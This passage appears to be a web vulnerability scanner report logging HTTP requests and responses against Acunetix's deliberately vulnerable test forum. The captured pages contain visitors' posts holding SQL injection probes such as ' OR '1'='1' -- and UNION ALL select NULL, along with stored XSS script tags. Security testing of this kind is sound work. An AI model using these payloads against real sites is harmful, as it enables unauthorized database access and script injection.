</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:44 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>o3lppoLN</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:05:24 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white)</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:06:11 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Call me maybe<script>alert('Beautiful in white')</script> - 202.187.185.168</div><div class='posttext'>HI Maybe<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 12:51:58 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 <script>alert('Hello')</script> - 180.75.245.68</div><div class='posttext'>HELLO<br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/13/2022 2:43:15 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>hi - 180.75.236.90</div><div class='posttext'>http://example.com/han.js<br />document.write("I'm coming");</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=1 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 5979 |
| Response Body - size: 5,979 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:27 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>'";'()(NULL</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:27 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script><br /></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:12:55 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:08 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>111 - 180.74.64.218</div><div class='posttext'>Message 1<script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:31 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:41 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>123 - 180.74.64.218</div><div class='posttext'><script>alert('Hello')</script></div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/0'><br>posted by <b> </b> on 3/13/2022 3:13:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Message 1<script>alert('Hello')</script> - 180.74.64.218</div><div class='posttext'>1232</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4135 |
| Response Body - size: 4,135 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a 